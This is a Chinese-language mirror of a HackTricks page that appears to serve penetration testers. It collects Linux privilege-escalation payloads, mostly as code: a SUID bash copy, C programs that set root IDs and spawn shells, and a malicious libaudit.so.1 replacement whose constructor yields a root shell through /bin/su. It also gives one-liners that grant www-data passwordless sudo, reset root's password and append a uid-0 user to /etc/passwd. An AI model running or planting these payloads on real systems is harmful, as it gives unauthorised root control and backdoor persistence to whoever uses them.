mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
6 KiB
6 KiB
执行载荷
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗? 想要看到您的公司在HackTricks中被宣传吗? 或者您想要访问PEASS的最新版本或下载HackTricks的PDF吗? 请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS & HackTricks周边
- 加入 💬 Discord群组 或 电报群组 或 关注我在Twitter上的**🐦@carlospolopm。**
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。
Bash
cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
C
//gcc payload.c -o payload
int main(void){
setresuid(0, 0, 0); //Set as user suid user
system("/bin/sh");
return 0;
}
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}
// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) {
char *const paramList[10] = {"/bin/bash", "-p", NULL};
const int id = 1000;
setresuid(id, id, id);
execve(paramList[0], paramList, NULL);
return 0;
}
覆盖文件以提升权限
常见文件
- 在 /etc/passwd 中添加带密码的用户
- 更改 /etc/shadow 中的密码
- 在 /etc/sudoers 中将用户添加到sudoers
- 通过docker套接字滥用docker,通常在 /run/docker.sock 或 /var/run/docker.sock 中
覆盖库
检查某些二进制文件使用的库,本例中为 /bin/su
:
ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
在这种情况下,让我们尝试冒充 /lib/x86_64-linux-gnu/libaudit.so.1
。
因此,检查 su
二进制文件使用的此库的函数:
objdump -T /bin/su | grep audit
0000000000000000 DF *UND* 0000000000000000 audit_open
0000000000000000 DF *UND* 0000000000000000 audit_log_user_message
0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message
000000000020e968 g DO .bss 0000000000000004 Base audit_fd
这些符号audit_open
、audit_log_acct_message
、audit_log_acct_message
和audit_fd
可能来自于libaudit.so.1库。由于libaudit.so.1将被恶意共享库覆盖,这些符号应该存在于新的共享库中,否则程序将无法找到该符号并退出。
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c
int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;
void inject()__attribute__((constructor));
void inject()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
现在,只需调用**/bin/su
**,您将获得 root shell。
脚本
您能让 root 执行某些操作吗?
将 www-data 添加到 sudoers
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
更改 root 密码
echo "root:hacked" | chpasswd
将新的 root 用户添加到 /etc/passwd
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
☁️ HackTricks 云 ☁️ - 🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家 网络安全公司 工作吗?想要看到你的 公司在 HackTricks 中被宣传?或者想要访问 PEASS 的最新版本或下载 HackTricks 的 PDF?查看 订阅计划!
- 探索 PEASS 家族,我们的独家 NFTs
- 获取 官方 PEASS & HackTricks 商品
- 加入 💬 Discord 群组 或者 电报群组 或者 关注 我的 推特 🐦@carlospolopm.
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。